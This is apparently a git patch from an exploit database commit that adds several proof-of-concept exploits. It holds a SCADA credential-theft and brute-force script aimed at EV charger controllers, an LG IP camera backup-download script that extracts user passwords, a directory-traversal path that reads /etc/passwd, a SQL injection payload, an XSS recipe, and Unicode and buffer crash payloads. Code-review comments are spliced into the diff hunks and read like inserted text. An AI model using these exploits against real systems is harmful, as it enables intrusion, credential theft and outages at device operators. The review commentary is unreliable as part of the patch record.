From b42759b8b8dc1953edb3d7df4e0e815239b876d1 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 13 Sep 2018 05:01:52 +0000 Subject: [PATCH] DB: 2018-09-13 15 changes to exploits/shellcodes jiNa OCR Image to Text 1.0 - Denial of Service (PoC) PixGPS 1.1.8 - Denial of Service (PoC) RoboImport 1.2.0.72 - Denial of Service (PoC) PicaJet FX 2.6.5 - Denial of Service (PoC) iCash 7.6.5 - Denial of Service (PoC) PDF Explorer 1.5.66.2 - Denial of Service (PoC) Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC) Apple macOS 10.13.4 - Denial of Service (PoC) CirCarLife SCADA 4.3.0 - Credential Disclosure Rubedo CMS 3.4.0 - Directory Traversal SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS) SynaMan 4.0 build 1488 - SMTP Credential Disclosure IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection MyBB 1.8.17 - Cross-Site Scripting LG Smart IP Camera 1508190 - Backup File Download --- exploits/hardware/webapps/45384.py | 371 +++++++++++++++++++++++++++++ exploits/hardware/webapps/45394.py | 113 +++++++++ exploits/linux/webapps/45385.txt | 13 + exploits/macos/dos/45391.py | 26 ++ exploits/php/webapps/45392.txt | 43 ++++ exploits/php/webapps/45393.txt | 21 ++ exploits/windows/dos/45388.py | 25 ++ exploits/windows/dos/45389.py | 25 ++ exploits/windows/dos/45390.py | 25 ++ exploits/windows/webapps/45386.txt | 39 +++ exploits/windows/webapps/45387.txt | 45 ++++ exploits/windows_x86/dos/45380.py | 25 ++ exploits/windows_x86/dos/45381.py | 25 ++ exploits/windows_x86/dos/45382.py | 25 ++ exploits/windows_x86/dos/45383.py | 25 ++ files_exploits.csv | 15 ++ 16 files changed, 861 insertions(+) create mode 100755 exploits/hardware/webapps/45384.py create mode 100755 exploits/hardware/webapps/45394.py create mode 100644 exploits/linux/webapps/45385.txt create mode 100755 exploits/macos/dos/45391.py create mode 100644 exploits/php/webapps/45392.txt create mode 100644 exploits/php/webapps/45393.txt create mode 100755 exploits/windows/dos/45388.py create mode 100755 exploits/windows/dos/45389.py create 
mode 100755 exploits/windows/dos/45390.py
create mode 100644 exploits/windows/webapps/45386.txt
create mode 100644 exploits/windows/webapps/45387.txt
create mode 100755 exploits/windows_x86/dos/45380.py
create mode 100755 exploits/windows_x86/dos/45381.py
create mode 100755 exploits/windows_x86/dos/45382.py
create mode 100755 exploits/windows_x86/dos/45383.py
diff --git a/exploits/hardware/webapps/45384.py b/exploits/hardware/webapps/45384.py
new file mode 100755
index 000000000..f6f1b203a
--- /dev/null
+++ b/exploits/hardware/webapps/45384.py
@@ -0,0 +1,371 @@ +# Exploit Title: CirCarLife SCADA 4.3.0 - Credential Disclosure +# Date: 2018-09-10 +# Exploit Author: David Castro +# Vendor Homepage: https://circontrol.com/ +# Shodan Dork: Server: CirCarLife Server: PsiOcppApp +# Version: CirCarLife Scada all versions under 4.3.0 OCPP implementation all versions under 1.5.0 +# CVE : CVE-2018-12634 + +''' +Description: Mutiple information disclosure issues, including admin credentials disclosure +''' + +import requests +from requests.auth import HTTPDigestAuth +from termcolor import colored +from bs4 import BeautifulSoup +import xml.etree.ElementTree as ET +import re +import json +import base64 + +cabecera = ''' + _.-="_- _ + _.-=" _- | ||"""""""---._______ __.. + ___.===""""-.______-,,,,,,,,,,,,`-''----" """"" """"" __' + __.--"" __ ,' CIR-PWN-LIFE o \ __ [__| + __-""=======.--"" ""--.=================================.--"" ""--.=======: +] [w] : / \ : |========================| : / \ : [w] : +V___________:| SadFud75 |: |========================| :| |: _-" + V__________: \ / :_|=======================/_____: \ / :__-" + -----------' "-____-" `-------------------------------' "-____-" + +''' + +print colored(cabecera, 'white') +print colored('[*] POC for automated exploitation for CirControl SCADA systems (circarlife and OCPP (Open Charge Point Protocol))', 'blue') +print colored('[?] Vendor site: https://circontrol.com/', 'yellow') +print colored('[*] CVEs associated: ', 'blue') +print colored('CVE-2018-12634, CVE-2018-16668, CVE-2018-16669, CVE-2018-16670, CVE-2018-16671, CVE-2018-16672', 'yellow') +print colored('[*] CirCarLife Scada versions affected: ', 'blue') +print colored('[+] All versions are vulnerable. No patch available, last version 4.3.0 (09/09/2018)', 'green') +print colored('[*] PsiOcppApp (PowerStudio integration Open Charge Point Protocol Application) versions affected: ', 'blue') +print colored('[+] All versions are vulnerable. 
No patch available, last version 1.5.0 (09/09/2018)', 'green') +print colored('[*] Shodan dorks: ', 'blue') +print colored('[+] Server: CirCarLife', 'green') +print colored('[+] Server: PsiOcppApp', 'green') +print colored('[?] More vulnerability POCs at https://github.com/SadFud/Exploits', 'yellow') + +plcs = [] +logutil = ['GPRS modem details'] +autenticado = False + +arr_versionessoft = [] +arr_ldevstat = [] +str_repository = '' +str_lversioneshard = '' +arr_logdetails = [] +str_lsetup = '' +str_lconfig = '' + +def lversionessoft(): + print colored('[*] Getting software versions via CVE-2018-16671', 'blue') + leakv = requests.get(target1 + '/html/device-id') + versiones = leakv.text.encode("utf8").split('\n') + print colored('[+] Software versions collected succesfully', 'green') + return versiones + +def ldevstat(): + print colored('[*] Getting plc status via CVE-2018-16670', 'blue') + leakstats = requests.get(target1 + '/services/user/values.xml?var=STATUS') + statsraw = leakstats.text + tree = ET.fromstring(statsraw) + for i in range(0,len(tree.findall(".//variable"))): + for j in range(0,2): + plcs.append(tree[i][j].text) + print colored('[+] information leaked from ' + str(len(plcs)/2) + ' plcs', 'green') + return plcs + +def plcstatus(code): + code = int(code) + if code == 1: + print colored('[+] OK', 'green') + elif code == 2: + if code == 0x10: + if code == 0x20: + print colored('[-] Error: Time out.', 'red') + elif code == 0x40: + print colored('[-] Error: Bad device.', 'red') + elif code == 0x80: + print colored('[-] Error: Bad phase.', 'red') + elif code == 0x100: + print colored('[-] Error: Bad version.', 'red') + else: + print colored('[-] Error: Unknown error.', 'red') + elif code == 4: + print colored('[-] Error: not initialized.', 'red') + else: + print colored('[?] 
Unknown code.', 'yellow') + +def repository(): + print colored('[*] Getting installation paths via CVE-2018-16668', 'blue') + path = requests.get(target1 + '/html/repository') + rutas = path.text.encode("utf8").split('\n') + platformpath = rutas[1].split(' ') + platformpath = platformpath[0] + appsrc = rutas[3] + appsrc = rutas[3].split(' ') + appsrc = appsrc[0] + raiz = str(appsrc).find('/circarlife/') + appsrc = appsrc[0:raiz+len('/circarlife/')] + print colored('[+] Platform installation path retrieved succesfully', 'green') + return 'Platform installation path: ' + platformpath + '\n[+] Applicaction installation path: ' + appsrc + +def lversioneshard(): + print colored('[*] Getting powerstudio driver versions via CVE-2018-12634', 'blue') + basura = ['/li', '<', 'body', 'html', '>', '/ul', '/'] + hardleak = requests.get(target1 + '/services/system/info.html') + hardleak = hardleak.text.encode("utf8").replace('
', '\n') + hardleak = hardleak.replace('
  • ', '\n') + for caca in basura: + hardleak = hardleak.replace(caca, '') + print colored('[+] Powerstudio driver versions leaked succesfully', 'green') + return hardleak + +def logdetails(): + print colored('[*] Leaking sensitive information via CVE-2018-12634', 'blue') + log = requests.get(target1 + '/html/log') + log = log.text.encode("utf8") + print colored('[*] Searching for modem id', 'blue') + posmid = log.rfind('/modem-start: modem id: ') + logarr = log.split('\n') + if posmid != -1: + logutil.append('Modem model:') + print colored('[*] Modem id located', 'blue') + for linea in logarr: + if '/modem-start: modem id: ' in linea: + print colored('[+] Modem id leaked', 'green') + linea = linea.split(' ') + logutil.append(linea[9]) + else: + print colored('[-] Modem id not found', 'red') + print colored('[*] Searching for GPRS modem credentials', 'blue') + poslogin = log.rfind('Greetings!!') + if poslogin != -1: + print colored('[*] Credentials found', 'blue') + logutil.append('Modem credentials') + print colored('[+] GPRS modem credentials retrieved', 'green') + for linea in logarr: + if 'password=\"' in linea: + linea = linea.split(' ') + logutil.append(linea[11]) + logutil.append(linea[12]) + else: + print colored('[-] GPRS modem credentials not found with CVE-2018-12634', 'red') + return logutil + +def lsetup(user, pwd): + print colored('[*] Exploiting CVE-2018-16672 to leak information', 'blue') + r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user, pwd)) + if r1.text.encode("utf8").find('not granted') != -1: + print colored('[-] Error, login failed', 'red') + else: + respuesta = r1.text.encode("utf8") + print colored('[+] Setup information leaked') + return respuesta + +def lbrute(): + global luser80 + global lpasswd80 + global luser8080 + global lpasswd8080 + dicc = raw_input('Enter dictionary file with extension[format[user:password]]: ') + listado = open(dicc, "r") + data = listado.readlines() + print colored('[*] 
Starting bruteforce...', 'blue') + for linea in data: + linea = linea.split(':') + user = linea[0] + pwd = linea[1] + r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user.strip(), pwd.strip())) + r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip())) + if r1.text.encode("utf8").find('not granted') != -1: + print colored('[-] Error, login failed on port 80 with ' + user + ':' + pwd, 'red') + else: + print colored('[+] Valid credentials found on port 80: ' + user + ':' + pwd, 'green') + luser80 = user + lpasswd80 = pwd + if r2.text.encode("utf8").find('Acess not granted') != -1: + print colored('[-] Error, login failed on port 8080 with ' + user + ':' + pwd, 'red') + else: + print colored('[+] Valid credentials found on port 8080: ' + user + ':' + pwd, 'green') + luser8080 = user + lpasswd8080 = pwd + listado.close() + +def lconfig(user, pwd): + print colored('[*] Leaking config file via CVE-2018-16669', 'blue') + r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip())) + if r2.text.encode("utf8").find('Acess not granted') != -1: + print colored('[-] Error. 
Login failed', 'red') + else: + config = r2.text.encode('utf8') + print colored('[+] Config file leaked succesfully', 'green') + return config + +def salida(versiones, plcs, ruta, hard, log, setup, config): + print colored('[*] Parsing information and generating output.', 'blue') + print colored('[*] Parsing software information', 'blue') + print colored('[+] Device name: ', 'green') + versiones[0] + print colored('[+] Software_name: ', 'green') + versiones[1] + print colored('[+] Software_version: ', 'green') + versiones[2] + print colored('[+] System time: ', 'green') + versiones[3] + print colored('[+] ', 'green') + ruta + print colored('[*] Parsing powerstudio driver versions', 'blue') + hard = hard.replace('ul', '') + print colored(hard.strip(), 'green') + print colored('[*] Parsing PLCs values', 'blue') + for i in range(0,len(plcs)): + if ((i % 2) != 0): + codigo = plcs[i].split('.') + plcstatus(codigo[0]) + else: + nombre = plcs[i].replace('.STATUS', '') + print colored('[+] PLC name: ' + nombre, 'green') + print colored('[*] Parsing leaked data from logs using CVE-2018-12634', 'blue') + if len(log) > 3: + print colored('[*] ' + log[0], 'blue') + for i in range(2,len(log)): + if log[i] != 'Modem credentials': + print colored('[+] GPRS router model found: ', 'green') + log[i] + break + for i in range(0,len(log)): + if log[i] == 'Modem credentials': + creds = i + break + + for i in range(creds + 1, len(log)): + if (log[i].rfind('user=')) != -1: + usuario = log[i].split('=') + user = usuario[1] + user = user.replace('\"', '') + if (log[i].rfind('password=')) != -1: + cont = log[i].split('=') + contrase = cont[1] + contrase = contrase.replace('\"', '') + contrase = contrase.replace(']', '') + break + print colored('[+] Username and password for GPRS modem found: ', 'green') + user + ':' + contrase + else: + colored('[?] 
No data was extracted from logs using CVE-2018-12634', 'yellow') + print colored('[*] Parsing setup file', 'blue') + if (len(str(setup)) > 5): + datos = json.loads(setup) + print colored('[*] Processing device configuration data: ', 'blue') + print colored('[+] MAC Address: ', 'green') + datos["device"]["mac"] + print colored('[+] IMEI: ', 'green') + datos["device"]["imei"] + print colored('[+] ICCID: ', 'green') + datos["device"]["iccid"] + print colored('[+] IMSI: ', 'green') + datos["device"]["imsi"] + print colored('[*] Processing network configuration data: ', 'blue') + print colored('[+] Hostname: ', 'green') + datos["network"]["hostname"] + print colored('[+] ClientId: ', 'green') + datos["network"]["clientid"] + print colored('[+] IP address: ', 'green') + datos["network"]["ip"] + print colored('[+] Netmask: ', 'green') + datos["network"]["netmask"] + print colored('[+] Gateway: ', 'green') + datos["network"]["gateway"] + print colored('[+] Name server 0: ', 'green') + datos["network"]["nameserver0"] + print colored('[+] Name server 1: ', 'green') + datos["network"]["nameserver1"] + print colored('[*] Processing locale options configuration data', 'blue') + print colored('[+] Language: ', 'green') + datos["locale"]["language"] + print colored('[+] Currency: ', 'green') + datos["locale"]["currency"] + print colored('[*] Processing public address configuration data', 'blue') + print colored('[+] Host type: ', 'green') + datos["paddress"]["hosttype"] + print colored('[+] Host: ', 'green') + datos["paddress"]["host"] + print colored('[*] Processing time configuration data', 'blue') + print colored('[+] NTP Server 0: ', 'green') + datos["time"]["ntpserver0"] + print colored('[+] NTP server 1: ', 'green') + datos["time"]["ntpserver1"] + print colored('[+] Timezone: ', 'green') + datos["time"]["timezone"] + print colored('[*] Processing GPRS modem configuration data', 'blue') + print colored('[+] Acess point name: ', 'green') + datos["modem"]["apn"] + print 
colored('[+] Username: ', 'green') + datos["modem"]["usr"] + print colored('[+] Password: ', 'green') + datos["modem"]["pwd"] + print colored('[+] Reset: ', 'green') + str(datos["modem"]["reset"]) + print colored('[+] Ping Ip: ', 'green') + str(datos["modem"]["pingip"]) + print colored('[+] Ping period: ', 'green') + str(datos["modem"]["pingperiod"]) + print colored('[+] Ping auto reset: ', 'green') + str(datos["modem"]["pingautoreset"]) + print colored('[*] Processing DDNS configuration data', 'blue') + print colored('[+] DDNS server: ', 'green') + datos["ddns"]["server"] + print colored('[+] DDNS host: ', 'green') + datos["ddns"]["host"] + print colored('[+] DDNS Username: ', 'green') + datos["ddns"]["usr"] + print colored('[+] DDNS password: ', 'green') + datos["ddns"]["pwd"] + print colored('[*] Processing security configuration data', 'blue') + print colored('[+] Username: ', 'green') + datos["security"]["user"] + print colored('[+] Password: ', 'green') + str(datos["security"]["passwd"]) + print colored('[*] Processing services configuration data', 'blue') + print colored('[+] iManager', 'green') + str(datos["services"]["imanager"]) + print colored('[+] Active-Integration: ', 'green') + str(datos["services"]["activeIntegration"]) + print colored('[+] Web Editor: ', 'green') + str(datos["services"]["webeditor"]) + print colored('[+] SCADA Applet: ', 'green') + str(datos["services"]["appletscada"]) + print colored('[+] Html5: ', 'green') + str(datos["services"]["html5"]) + print colored('[*] Parsing Open Charge Point Protocol configuration file', 'blue') + else: + print colored('[-] Unable to retrieve the setup config file', 'red') + if (len(str(config)) > 10): + tree = ET.fromstring(config) + print colored('[*] Processing management system CS settings', 'blue') + print colored('[+] End point: ', 'green') + str(tree.find('.//csEndPoint').text) + print colored('[+] Username: ', 'green') + str(tree.find('.//csUser').text) + print colored('[+] Password: ', 
'green') + str(tree.find('.//csPassword').text) + print colored('[+] Litle endian: ', 'green') + str(tree.find('.//isLitleEndian').text) + print colored('[*] Processing Charge Box settings file', 'blue') + print colored('[+] Charge box Protocol: ', 'green') + str(tree.find('.//cbProtocol').text) + print colored('[+] Charge box certificate: ', 'green') + str(tree.find('.//cbRequireCsClientCertificate').text) + print colored('[+] Charge box ID: ', 'green') + str(tree.find('.//cbId').text) + print colored('[+] Charge box Username: ', 'green') + str(tree.find('.//cbUser').text) + print colored('[+] Charge box password: ', 'green') + str(tree.find('.//cbPassword').text) + print colored('[+] Charge box OCPP internal port: ', 'green') + str(tree.find('.//cbOcppPortInternal').text) + print colored('[+] Charge box OCPP public port: ', 'green') + str(tree.find('.//cbOcppPortPublic').text) + print colored('[+] Charge box use whitelist: ', 'green') + str(tree.find('.//cbUseWl').text) + print colored('[+] Charge box whitelist first: ', 'green') + str(tree.find('.//cbWlFirst').text) + print colored('[+] Charge box offline authentication: ', 'green') + str(tree.find('.//cbAuthOffline').text) + print colored('[+] Charge box internal error retry delay: ', 'green') + str(tree.find('.//cbRetryInternalErr').text) + print colored('[+] Charge box use OCPP T-Sync: ', 'green') + str(tree.find('.//cbUseOcppTSync').text) + print colored('[+] Charge box use compression: ', 'green') + str(tree.find('.//cbUseCompression').text) + print colored('[+] Charge box use aprtial energy: ', 'green') + str(tree.find('.//cbUsePartialEnergy').text) + #print colored('[+] Charge box use partial energy meter value: ', 'green') + str(tree.find('.//cbUsePartialEnergyMeterVal').text) + print colored('[+] Charge box stop if unauthenticated: ', 'green') + str(tree.find('.//cbStopIfUnauth').text) + print colored('[+] Charge box stop if concurrent tx: ', 'green') + str(tree.find('.//cbStopIfConcurrentTx').text) + 
print colored('[+] Charge box hearth-beat interval: ', 'green') + str(tree.find('.//cbHbInterval').text) + print colored('[+] Charge box connection time out interval: ', 'green') + str(tree.find('.//cbConnTimeOut').text) + print colored('[+] Charge box meter interval: ', 'green') + str(tree.find('.//cbMeterInterval').text) + #print colored('[+] Charge box public Ip timeout interval: ', 'green') + str(tree.find('.//cbPublicIpTimeOut').text) + #print colored('[+] Charge box authentication required for remote start: ', 'green') + str(tree.find('.//cbRequireAuthRemoteStart').text) + #print colored('[+] Charge box meter requires power: ', 'green') + str(tree.find('.//cbMeterValRequiresPower').text) + print colored('[*] Processing Powerstudio engine settings file' , 'blue') + print colored('[+] Powerstudio engine host: ', 'green') + str(tree.find('.//pwStdHost').text) + print colored('[+] Powerstudio engine port: ', 'green') + str(tree.find('.//pwStdPort').text) + print colored('[+] Powerstudio engine username: ', 'green') + str(tree.find('.//pwStdUser').text) + print colored('[+] Powerstudio engine password: ', 'green') + base64.b64decode(str(tree.find('.//pwStdPassword').text)) + print colored('[+] Powerstudio engine username (with edit permissions): ', 'green') + str(tree.find('.//pwStdUserEdit').text) + print colored('[+] Powerstudio engine password (with edit permissions): ', 'green') + base64.b64decode(str(tree.find('.//pwStdPasswordEdit').text)) + print colored('[*] Processing powerstudio application parameters', 'blue') + print colored('[+] Powerstudio application port: ', 'green') + str(tree.find('.//pssPort').text) + print colored('[+] Powerstudio application admin: ', 'green') + str(tree.find('.//pssAdminUser').text) + print colored('[+] Powerstudio application password: ', 'green') + base64.b64decode(str(tree.find('.//pssAdminPassword').text)) + print colored('[+] Powerstudio application debug logging level: ', 'green') + str(tree.find('.//pssLoglevel').text) 
+ else: + print colored('[-] Unable to retrieve the OCPP config file', 'red') + +#entrypoint +url = raw_input('Insert target ip: ') +target1 = 'http://' + url +target2 = 'http://' + url + ':8080' +luser80 = 'admin' +lpasswd80 = '1234' +luser8080 = 'admin' +lpasswd8080 = '1234' +luser80 = raw_input('Insert username for login at circarlife server: (b to bruteforce)') +if (luser80 == 'b'): + lbrute() +else: + lpasswd80 = raw_input('Insert password for login at circarlife server: ') + luser8080 = raw_input('Insert username for login at OCPP server: ') + lpasswd8080 = raw_input('Insert password for login at OCPP server: ') + +versiones = lversionessoft() +plcs = ldevstat() +ruta = repository() +hard = lversioneshard() +log = logdetails() +setup = lsetup(luser80.strip(), lpasswd80.strip()) +config = lconfig(luser8080.strip(), lpasswd8080.strip()) +salida(versiones, plcs, ruta, hard, log, setup, config) \ No newline at end of file diff --git a/exploits/hardware/webapps/45394.py b/exploits/hardware/webapps/45394.py new file mode 100755 index 000000000..051474b53 --- /dev/null +++ b/exploits/hardware/webapps/45394.py 
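Review bot: `plcstatus` can never reach its detailed error branches: the `0x20`/`0x40`/`0x80`/`0x100` comparisons sit under `if code == 0x10:`, which itself sits under `elif code == 2:`, so a status of 2 prints nothing at all and every other value except 1 and 4 falls through to "Unknown code". If those values are meant to be reported individually, the comparisons should be siblings of the `code == 1` / `code == 4` checks (or, if they are flag bits, tested with `&`) — the device's status semantics are not visible here, so that needs confirming against the vendor documentation. In `salida`, `creds` is assigned only when a 'Modem credentials' entry exists, so `range(creds + 1, len(log))` raises UnboundLocalError whenever the log yielded more than three entries without credentials, and the `else:` branch closing that section calls `colored(...)` without `print`, so its message is silently discarded. `lsetup` and `lconfig` also return None on the failure path with no explicit `return`, which `salida` only tolerates because `len(str(None))` happens to be small; an explicit `return ''` would make that contract visible.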
@@ -0,0 +1,113 @@ +# Exploit Title: LG Smart IP Camera 1508190 - Backup File Download +# Date: 2018-09-11 +# Exploit Author: Ege Balci +# Vendor Homepage: https://www.lg.com +# Software version: 1310250 <= 1508190 +# Model: LNB*/LND*/LNU*/LNV* +# CVE: CVE-2018-16946 + +# Description: smart network camera devices have broken access control. Attackers are able to +# download /updownload/t.report (aka Log & Report) files and download backup files (via download.php) +# without authenticating. These backup files contain user credentials and configuration information for +# the camera device. An attacker is able to discover the backup filename via reading the system logs or +# report data, or just by brute-forcing the backup filename pattern. It may be possible to authenticate +# to the admin account with the admin password. + +# lg_smart_ip.py + +#!/usr/bin/python3 + +import os +import sys +import sqlite3 +import tarfile +import requests +import datetime +import threading + +if len(sys.argv) < 2: + print("Usage:\n\t"+sys.argv[0]+" ") + exit(0) + +print("#==========================================================================#") +print("# Exploit Title: LG Smart IP Device Backup Download") +print("# Date: 09-11-2018") +print("# Exploit Author: Ege Balcı") +print("# Vendor Homepage: https://www.lg.com") +print("# Model: LNB*/LND*/LNU*/LNV*") +print("# CVE: CVE-2018-16946") +print("#==========================================================================#\n\n") + +model_version_list = ["2219.0.0.1505220","2745.0.0.1508190","1954.0.0.1410150", "1030.0.0.1310250"] + +# First try the default login creds... 
+headers = {'Authorization': 'Basic YWRtaW46YWRtaW4='} +default = requests.get(sys.argv[1]+"/httpapi?GetDeviceInformation", headers=headers) +if "Model:" in default.text: + print("[+] Default password works (admin:admin)") + # exit(0) + + +def brute(model_version): + date = datetime.datetime.now() + u = (['\\','|','/','-']) + + for i in range(0,3650): # No need to go back futher these cameras didn't existed 10 years ago + sys.stdout.flush() + sys.stdout.write("\r[*] Bruteforing backup date...{0}".format(u[i%4])) + + log_date = date.strftime("%y") + log_date += date.strftime("%m") + log_date += date.strftime("%d") + + url = "/download.php?file=" + backup_name = "backup_" + backup_name += log_date + backup_name += "_"+model_version+".config" + + + ContentLength = requests.head(sys.argv[1]+url+backup_name,stream=True).headers["Content-Length"] + if ContentLength != "": + backup = requests.get(sys.argv[1]+url+backup_name) + print("\n[+] Backup file found !") + print("[+] "+backup_name+" -> "+str(len(backup.content))+"\n") + backup_file = open(backup_name+".tar.gz","wb") + backup_file.write(backup.content) + backup_file.close() + tar = tarfile.open(str(backup_name+".tar.gz"),mode="r:gz") + for member in tar.getnames(): + # Print contents of every file + print("[>] "+member) + mem = open(member,"wb") + mem.write(tar.extractfile(member).read()) + + + conn = sqlite3.connect('mipsca.db') + c = conn.cursor() + users = c.execute("SELECT * FROM User") + print("#=============== SUCCESS ===============#") + for u in users: + print("\n[#] Username: "+u[0]) + print("[#] Password: "+u[1]) + os.system("rm mipsca.db ConfigInfo.txt "+ backup_name+".tar.gz") + break + date = (date-datetime.timedelta(days=1)) + + + +report = requests.get(sys.argv[1]+"/updownload/t.report",verify=False) +if report.status_code != 200: + print("[-] Target device don't have report data :(") + jobs = [] + for mv in model_version_list: + t = threading.Thread(target=brute(mv)) + jobs.append(t) + + for j in 
jobs: + j.start() +else: + model_id = (((report.text.split("= "))[1]).split("\n"))[0] + print("[+] Model ID: "+model_id) + version = (((report.text.split("= "))[2]).split("\n"))[0] + print("[+] Version: "+version) + brute(model_id+"."+version) \ No newline at end of file diff --git a/exploits/linux/webapps/45385.txt b/exploits/linux/webapps/45385.txt new file mode 100644 index 000000000..afa96b8ea --- /dev/null +++ b/exploits/linux/webapps/45385.txt @@ -0,0 +1,13 @@ +# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal +# Google Dork: intext:rubedo.current.page.description +# Date: 2018-09-11 +# Exploit Author: Marouene Boubakri +# Vendor Homepage: https://www.rubedo-project.org +# Version: through 3.4.0 +# Tested on: Linux +# CVE : CVE-2018-16836 + +# PoC: +# Read /etc/passwd file from remote server + +/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd' \ No newline at end of file diff --git a/exploits/macos/dos/45391.py b/exploits/macos/dos/45391.py new file mode 100755 index 000000000..6f5225094 --- /dev/null +++ b/exploits/macos/dos/45391.py 
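Review bot: The backup handling trusts everything the target returns: each tar member is written with `open(member, "wb")` using the archive-supplied name, with no check for `../` or absolute paths, and the cleanup runs `os.system("rm mipsca.db ConfigInfo.txt " + backup_name + ".tar.gz")` where, on the report path, `backup_name` is built from `model_id` and `version` parsed straight out of the device's `t.report` response. A hostile or spoofed device (anything answering on that URL) could therefore write files outside the working directory or inject shell commands on the host running the script. Restricting members to plain regular-file names, closing the extracted file handles, and deleting with `os.remove` instead of a shell string addresses both; the rewritten extraction and cleanup are below, with the sqlite query in between left as is.
```python
for member in tar.getmembers():
    # the archive comes from the target: accept only plain regular-file names
    if not member.isfile() or member.name != os.path.basename(member.name):
        print("[-] Skipping unexpected archive member: " + member.name)
        continue
    print("[>] " + member.name)
    with open(member.name, "wb") as mem:
        mem.write(tar.extractfile(member).read())
# … unchanged: sqlite3 query of mipsca.db and credential printout …
for leftover in ("mipsca.db", "ConfigInfo.txt", backup_name + ".tar.gz"):
    try:
        os.remove(leftover)
    except OSError:
        pass  # best-effort cleanup, as the original rm was
```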
@@ -0,0 +1,26 @@
+# Exploit Title: Apple MacOS 10.13.4 - Denial of Service (PoC)
+# Date: 2019-09-10
+# Exploit Author: Sriram (@Sri_Hxor)
+# Vendor Homepage: https://support.apple.com/en-in/HT208848
+# Tested on: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0
+# CVE : CVE-2018-4240 (2018)
+# POC : https://medium.com/@thesriram/cold-war-between-single-message-vs-mbbs-d5e004d64eaf
+
+# Crashing Phone via RLM character.
+# Steps to Reproduce,
+
+# Run the below python script as "python apple.py", it will create a file called "dos_apple.txt"
+# Copy the text from the generated apple.txt
+# Paste it in WhatsApp and send it, victim gotta click and it will start crashing
+
+end = "‮ereh-hcuot-t'nod"
+dos = "‎‏"
+payload = dos*1000 + end
+try:
+ f=open("dos_apple.txt","w")
+ print "[+] Creating %s DOS payload for apple..." % ((len(payload)-len(end))/len(dos))
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "Can't create a file, check DIR permissions?"
\ No newline at end of file
diff --git a/exploits/php/webapps/45392.txt b/exploits/php/webapps/45392.txt
new file mode 100644
index 000000000..77a30ada1
--- /dev/null
+++ b/exploits/php/webapps/45392.txt
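Review bot: The bare `except:` around the file write swallows every exception, including KeyboardInterrupt and SystemExit, and then prints a permissions hint that may have nothing to do with the real failure; narrow it to `except (IOError, OSError) as exc:` and report the cause with `print "Can't create dos_apple.txt: %s" % exc`. The same bare-except pattern is repeated in 45388.py, 45389.py and 45390.py, where a `with open(...) as f:` block would also remove the manual `f.close()`. The comments here also disagree with the code: the script writes `dos_apple.txt` but the reproduction steps tell the reader to copy from "apple.txt", and the `Date:` header reads 2019-09-10 in a 2018-09 commit, which looks like a typo.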
@@ -0,0 +1,43 @@ +# Exploit Title: [Unauthenticated Remote SQLi] +# Date: [11/09/2018] +# Exploit Author: [Mohamed Sayed - From SecureMisr Company] +# Vendor Homepage: [https://www-01.ibm.com/support/docview.wss?uid=ibm10728883] +# Version: [IGI 5.2.3.2] (REQUIRED) +# Tested on: [Windows 10] +# CVE : [CVE-2018-1756] + +Hello , +IBM IGI version 5.2.3.2 is suffering from unauthenticated remote SQLi +The vulnerability enable *remote unauthenticated* attacker to take over the +server database and affect the confidentiality , integrity and availability +of the system , + +The vulnerability is in the survey end point API +/survey/api/config?userId=XXX + +The userId parameter value is injected directly to a sql query without +sensitization nor validation and by exploiting it the attacker will be able +to gain access on the server database + +SAMPLE of Vulnerable HTTP Request + +GET /survey/api/config?userId=VUL HTTP/1.1 +Host: HOST_IP +Connection: close +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 +Accept: */* +Referer: https://HOST_IP +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 + +Payload sample : +userId=1 'AND 1=1 AND '2'='2 + + +Mohamed Sayed +Sr.Information Security analyst + +*Please make sure to encrypt any sensitive information or attachments , you +can download my Public PGP key from* here + \ No newline at end of file diff --git a/exploits/php/webapps/45393.txt b/exploits/php/webapps/45393.txt new file mode 100644 index 000000000..a8e4c7324 --- /dev/null +++ b/exploits/php/webapps/45393.txt 
@@ -0,0 +1,21 @@
+# Exploit Title: MyBB 1.8.17 - Cross-Site Scripting
+# Date: 2018-08-11
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://mybb.com/download/
+# Version: 1.8.17
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-15596
+
+# 1. Description:
+# On the forum RSS Syndication page you can generate a URL for example...
+# http://localhost/syndication.php?fid=&type=atom1.0&limit=15, the thread titles on
+# those generated links aren't sanitized.
+
+# 2. Proof of Concept:
+
+- Make or find a thread of yours on the RSS feed
+- Use this payload as the thread title Cool Thread Title
+- View RSS feed with your thread again but with the generated URL and click on your thread
+- When the thread is clicked you will be redirected to google.com
\ No newline at end of file
diff --git a/exploits/windows/dos/45388.py b/exploits/windows/dos/45388.py
new file mode 100755
index 000000000..1df370d0f
--- /dev/null
+++ b/exploits/windows/dos/45388.py
@@ -0,0 +1,25 @@
+# Exploit Title: iCash 7.6.5 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-12
+# Software Link: https://www.maxprog.com/site/misc/downloads_us.php
+# Tested Version: 7.6.5
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program. When inside the program click "File" > "Connect to Server..."
+# Now paste the contents of "exploit.txt" into the fields:"Host"
+# Click the "Connect" button and you will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 7000
+
